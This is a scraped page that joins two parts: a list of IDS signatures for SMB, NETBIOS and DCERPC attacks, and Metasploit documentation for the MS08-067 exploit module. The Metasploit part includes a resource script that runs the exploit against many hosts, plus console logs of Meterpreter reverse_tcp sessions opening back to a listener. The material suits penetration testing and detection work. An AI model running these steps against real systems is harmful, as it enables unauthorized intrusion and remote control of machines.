alert tcp $HOME_NET 139 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB repeated logon failure"; flow:from_server,established; content:"|FF|SMB"; depth:4; offset:4; content:"s"; within:1; content:"m|00 00 C0|"; within:4; threshold:type threshold,track by_dst,count 10,seconds 60; classtype:unsuccessful-user; sid:2102923; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB repeated logon failure

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : unsuccessful-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102924

alert tcp $HOME_NET 445 -> $EXTERNAL_NET any (msg:"GPL NETBIOS SMB-DS repeated logon failure"; flow:from_server,established; content:"|FF|SMB"; depth:4; offset:4; content:"s"; within:1; content:"m|00 00 C0|"; within:4; threshold:type threshold,track by_dst,count 10,seconds 60; classtype:unsuccessful-user; sid:2102924; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS repeated logon failure

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : unsuccessful-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2101239

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS RFParalyze Attempt"; flow:to_server,established; content:"BEAVIS"; content:"yep yep"; reference:bugtraq,1163; reference:cve,2000-0347; reference:nessus,10392; classtype:attempted-recon; sid:2101239; rev:10; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : RFParalyze Attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-recon

URL reference : bugtraq,1163|cve,2000-0347|nessus,10392

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 10

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102950

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB too many stacked requests"; flow:to_server,established; content:"|FF|SMB"; pcre:"/^x00.{3}xFFSMB(x73|x74|x75|xa2|x24|x2d|x2e|x2f).{28}(x73|x74|x75|xa2|x24|x2d|x2e|x2f)/"; byte_jump:2,39,little; content:!"|FF|"; within:1; distance:-36; classtype:protocol-command-decode; sid:2102950; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB too many stacked requests

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103043

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt"; flow:stateless; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(x75|x2d|x2f|x73|xa2|x2e|x24|x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A0|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|01 00|"; within:2; distance:37; byte_jump:4,-7,little,relative,from_beginning; content:!"|00 00 00 00|"; within:4; distance:16; byte_jump:4,16,relative,little; content:"|00 00|"; within:2; distance:-10; classtype:protocol-command-decode; sid:2103043; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE andx invalid SACL ace size dos attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103000

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP unicode asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBs"; within:5; distance:3; byte_test:1,&,128,6,relative; byte_test:4,&,2147483648,48,relative,little; content:!"NTLMSSP"; within:7; distance:54; asn1:double_overflow, bitstring_overflow, relative_offset 54, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103000; rev:8; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP unicode asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 8

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025090

#alert tcp any any -> any [139,445] (msg:"ET NETBIOS Tree Connect AndX Request IPC$ Unicode"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMBu"; within:5; distance:3; content:"| 00 5c 00 69 00 70 00 63 00 24 00 00 00|"; nocase; flowbits:set,smb.tree.connect.ipc; flowbits:noalert; metadata: former_category NETBIOS; reference:cve,2006-4691; classtype:protocol-command-decode; sid:2025090; rev:1; metadata:created_at 2016_06_14, updated_at 2017_11_29;)

Name : Tree Connect AndX Request IPC$ Unicode

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2006-4691

CVE reference : Not defined

Creation date : 2016-06-14

Last modified date : 2017-11-29

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025790

alert tcp $HOME_NET [445,139] -> any any (msg:"ET NETBIOS PolarisOffice Insecure Library Loading - SMB ASCII"; flow:from_server; content:"SMB"; offset:4; depth:5; byte_test:1,!&,0x80,7,relative; content:"puiframeworkproresenu|2E|dll"; nocase; distance:0; fast_pattern; reference:url, exploit-db.com/exploits/44985/; metadata: former_category NETBIOS; reference:cve,2018-12589; classtype:attempted-user; sid:2025790; rev:1; metadata:attack_target Client_Endpoint, deployment Perimeter, created_at 2018_07_06, updated_at 2018_07_18;)

Name : PolarisOffice Insecure Library Loading — SMB ASCII

Attack target : Client_Endpoint

Description : This signature will detect an attempt to exploit an Insecure Library Loading vulnerability in PolarisOffice

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : cve,2018-12589

CVE reference : Not defined

Creation date : 2018-07-06

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025791

alert tcp $HOME_NET [445,139] -> any any (msg:"ET NETBIOS PolarisOffice Insecure Library Loading - SMB Unicode"; flow:from_server; content:"SMB"; offset:4; depth:5; byte_test:1,&,0x80,7,relative; content:"p|00|u|00|i|00|f|00|r|00|a|00|m|00|e|00|w|00|o|00|r|00|k|00|p|00|r|00|o|00|r|00|e|00|s|00|e|00|n|00|u|00 2E 00|d|00|l|00|l|00|"; nocase; distance:0; reference:url, exploit-db.com/exploits/44985/; metadata: former_category NETBIOS; reference:cve,2018-12589; classtype:attempted-user; sid:2025791; rev:1; metadata:attack_target Client_Endpoint, deployment Perimeter, created_at 2018_07_06, updated_at 2018_07_18;)

Name : PolarisOffice Insecure Library Loading — SMB Unicode

Attack target : Client_Endpoint

Description : This signature will detect an attempt to exploit an Insecure Library Loading vulnerability in PolarisOffice

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-user

URL reference : cve,2018-12589

CVE reference : Not defined

Creation date : 2018-07-06

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Not defined

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2025824

alert tcp any any -> $HOME_NET 445 (msg:"ET NETBIOS Microsoft Windows RRAS SMB Remote Code Execution"; flow:established,to_server; content:"|21 00 00 00 10 27 00 00 a4 86 01 00 41 41 41 41 04 00 00 00 41 41 41 41 a4 86 01 00 ad 0b 2d 06 d0 ba 61 41 41 90 90 90 90 90|"; metadata: former_category NETBIOS; reference:cve,2017-11885; reference:url,exploit-db.com/exploits/44616/; classtype:attempted-user; sid:2025824; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_and_Server, deployment Perimeter, deployment Datacenter, signature_severity Major, created_at 2018_07_11, performance_impact Low, updated_at 2018_07_18;)

Name : Microsoft Windows RRAS SMB Remote Code Execution

Attack target : Client_and_Server

Description : This signature will detect an attempt to exploit a Remote Code Execution in Windows

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : attempted-user

URL reference : cve,2017-11885|url,exploit-db.com/exploits/44616/

CVE reference : Not defined

Creation date : 2018-07-11

Last modified date : 2018-07-18

Rev version : 1

Category : NETBIOS

Severity : Major

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Low

2027167

#alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC WMI Remote Process Execution"; flow:to_server,established; dce_iface:00000143-0000-0000-c000-000000000046; metadata: former_category NETBIOS; classtype:bad-unknown; sid:2027167; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Informational, created_at 2019_04_09, updated_at 2019_04_09;)

Name : DCERPC WMI Remote Process Execution

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : Not defined

CVE reference : Not defined

Creation date : 2019-04-09

Last modified date : 2019-04-09

Rev version : 1

Category : NETBIOS

Severity : Informational

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027189

alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC DCOM ExecuteShellCommand Call - Likely Lateral Movement"; flow:established,to_server; content:"|00|E|00|x|00|e|00|c|00|u|00|t|00|e|00|S|00|h|00|e|00|l|00|l|00|C|00|o|00|m|00|m|00|a|00|n|00|d|00|"; metadata: former_category NETBIOS; reference:url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/; reference:url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/; reference:url,attack.mitre.org/techniques/T1175/; classtype:bad-unknown; sid:2027189; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Minor, created_at 2019_04_11, updated_at 2019_04_11;)

Name : DCERPC DCOM ExecuteShellCommand Call — Likely Lateral Movement

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/|url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/|url,attack.mitre.org/techniques/T1175/

CVE reference : Not defined

Creation date : 2019-04-11

Last modified date : 2019-04-11

Rev version : 1

Category : NETBIOS

Severity : Minor

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027190

#alert tcp any any -> $HOME_NET any (msg:"ET NETBIOS DCERPC DCOM ShellExecute - Likely Lateral Movement"; flow:established,to_server; content:"|00|S|00|h|00|e|00|l|00|l|00|E|00|x|00|e|00|c|00|u|00|t|00|e|00|"; metadata: former_category NETBIOS; reference:url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/; reference:url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/; reference:url,attack.mitre.org/techniques/T1175/; classtype:bad-unknown; sid:2027190; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Internal, signature_severity Minor, created_at 2019_04_11, updated_at 2019_04_11;)

Name : DCERPC DCOM ShellExecute — Likely Lateral Movement

Attack target : Client_Endpoint

Description : Not defined

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : bad-unknown

URL reference : url,enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/|url,enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/|url,attack.mitre.org/techniques/T1175/

CVE reference : Not defined

Creation date : 2019-04-11

Last modified date : 2019-04-11

Rev version : 1

Category : NETBIOS

Severity : Minor

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2027237

alert tcp any any -> $HOME_NET 135 (msg:"ET NETBIOS DCERPC SVCCTL - Remote Service Control Manager Access"; flow:established,to_server; content:"|00 00 00 00 00 00 00 00|"; content:"|13 00 0d 81 bb 7a 36 44 98 f1 35 ad 32 98 f0 38 00 10 03|"; distance:0; within:100; metadata: former_category RPC; classtype:attempted-user; sid:2027237; rev:2; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_and_Server, deployment Perimeter, signature_severity Major, created_at 2019_04_22, performance_impact Low, updated_at 2019_04_22;)

Name : DCERPC SVCCTL — Remote Service Control Manager Access

Attack target : Client_and_Server

Description : Alerts on Windows remote service control manager access.

Tags : Not defined

Affected products : Windows_XP/Vista/7/8/10/Server_32/64_Bit

Alert Classtype : attempted-user

URL reference : Not defined

CVE reference : Not defined

Creation date : 2019-04-22

Last modified date : 2019-04-22

Rev version : 2

Category : RPC

Severity : Major

Ruleset : ET

Malware Family : Not defined

Type : SID

Performance Impact : Low

Источник

This page contains detailed information about how to use the exploit/windows/smb/ms08_067_netapi metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

  • Module Overview
    • Module Ranking and Traits
    • Basic Usage
  • Required Options
  • Knowledge Base
    • Vulnerable Application
    • Verification Steps
    • Options
    • Scenarios
  • Msfconsole Usage
    • Module Options
    • Advanced Options
    • Exploit Targets
    • Compatible Payloads
    • Evasion Options
  • Error Messages
  • Related Pull Requests
  • References
  • See Also
  • Authors
  • Version

Module Overview

Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption

Module: exploit/windows/smb/ms08_067_netapi

Source code: modules/exploits/windows/smb/ms08_067_netapi.rb

Disclosure date: 2008-10-28

Last modification time: 2021-12-02 16:33:02 +0000

Supported architecture(s):

Supported platform(s): Windows

Target service / protocol: microsoft-ds, netbios-ssn

Target network port(s): 139, 445

List of CVEs: CVE-2008-4250

This module exploits a parsing flaw in the path
canonicalization code of NetAPI32.dll through the Server
Service. This module is capable of bypassing NX on some
operating systems and service packs. The correct target must
be used to prevent the Server Service (along with a dozen
others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on
subsequent attempts. This is just the first version of this
module, full support for NX bypass on 2003, along with other
platforms, is still in development.

Module Ranking and Traits

Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage

Using ms08_067_netapi against a single host

Normally, you can use exploit/windows/smb/ms08_067_netapi this way:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show targets
    ... a list of targets ...
msf exploit(ms08_067_netapi) > set TARGET target-id
msf exploit(ms08_067_netapi) > show options
    ... show and set options ...
msf exploit(ms08_067_netapi) > exploit

Using ms08_067_netapi against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your
ms08_067_netapi will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and
payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/windows/smb/ms08_067_netapi")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following
MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

Knowledge Base

ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is
considered a reliable exploit and allows you to gain access as SYSTEM — the highest Windows
privilege. In modern day penetration tests, this exploit would most likely be used in an internal
environment and not so much from external due to the likelihood of a firewall.

The check command of ms08_067_netapi is also highly accurate, because it is actually testing the
vulnerable code path, not just passively.

Vulnerable Application

This exploit works against a vulnerable SMB service from one of these Windows systems:

  • Windows 2000
  • Windows XP
  • Windows 2003

To reliably determine whether the machine is vulnerable, you will have to either examine
the system’s patch level, or use a vulnerability check.

Verification Steps

Please see Basic Usage under Overview.

Options

Please see Required Options under Overview.

Scenarios

Failure to detect the language pack

On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this
message:

Windows 2003 R2 Service Pack 2 — lang:Unknown

This is because the targeted system does not allow itself to be enumerated without authentication.
In this case, either you can set the username and password to be able to use automatic detection,
like this:

set SMBUSER [username]
set SMBPASS [password]

Or you must manually set the target with the correct language, for example:

set target [target ID]

Unsafe configuration of LHOST

Although ms08_067_netapi is reliable enough for a memory corruption exploit, it has its own
denial-of-service moments. One scenario is when the LHOST option is incorrectly configured,
which could result the SMB to crash.

Go back to menu.

Msfconsole Usage

Here is how the windows/smb/ms08_067_netapi exploit module looks in the msfconsole:

msf6 > use exploit/windows/smb/ms08_067_netapi

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > show info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <[email protected]>
  Brett Moore <[email protected]>
  frank2 <[email protected]>
  jduck <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese - Brazilian (NX)
  68  Windows 2003 SP2 Spanish (NO NX)
  69  Windows 2003 SP2 Spanish (NX)
  70  Windows 2003 SP2 Japanese (NO NX)
  71  Windows 2003 SP2 French (NO NX)
  72  Windows 2003 SP2 French (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

Module Options

This is a complete list of options available in the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Advanced Options

Here is a complete list of advanced options supported by the windows/smb/ms08_067_netapi exploit:

msf6 exploit(windows/smb/ms08_067_netapi) > show advanced

Module advanced options (exploit/windows/smb/ms08_067_netapi):

   Name                    Current Setting    Required  Description
   ----                    ---------------    --------  -----------
   CHOST                                      no        The local client address
   CPORT                                      no        The local client port
   ConnectTimeout          10                 yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                     no        The information file that contains context information
   DCERPC::ReadTimeout     10                 yes       The number of seconds to wait for DCERPC responses
   DisablePayloadHandler   false              no        Disable the handler code for the selected payload
   EnableContextEncoding   false              no        Use transient context when encoding payloads
   NTLM::SendLM            true               yes       Always send the LANMAN response (except when NTLMv2_session is specified)
   NTLM::SendNTLM          true               yes       Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
   NTLM::SendSPN           true               yes       Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required
   NTLM::UseLMKey          false              yes       Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
   NTLM::UseNTLM2_session  true               yes       Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
   NTLM::UseNTLMv2         true               yes       Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   SMB::AlwaysEncrypt      true               yes       Enforces encryption even if the server does not require it (SMB3.x only). Note that when it is set to false, the SMB client will still encrypt the communication if the server requires it
   SMB::ChunkSize          500                yes       The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
   SMB::Native_LM          Windows 2000 5.0   yes       The Native LM to send during authentication
   SMB::Native_OS          Windows 2000 2195  yes       The Native OS to send during authentication
   SMB::VerifySignature    false              yes       Enforces client-side verification of server response signatures
   SMBDirect               true               no        The target port is a raw SMB service (not NetBIOS)
   SMBDomain               .                  no        The Windows domain to use for authentication
   SMBName                 *SMBSERVER         yes       The NetBIOS hostname (required for port 139 connections)
   SMBPass                                    no        The password for the specified username
   SMBUser                                    no        The username to authenticate as
   SSL                     false              no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                  no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER               no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto               yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false              no        Enable detailed status messages
   WORKSPACE                                  no        Specify the workspace for this module
   WfsDelay                2                  no        Additional delay in seconds to wait for a session

Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
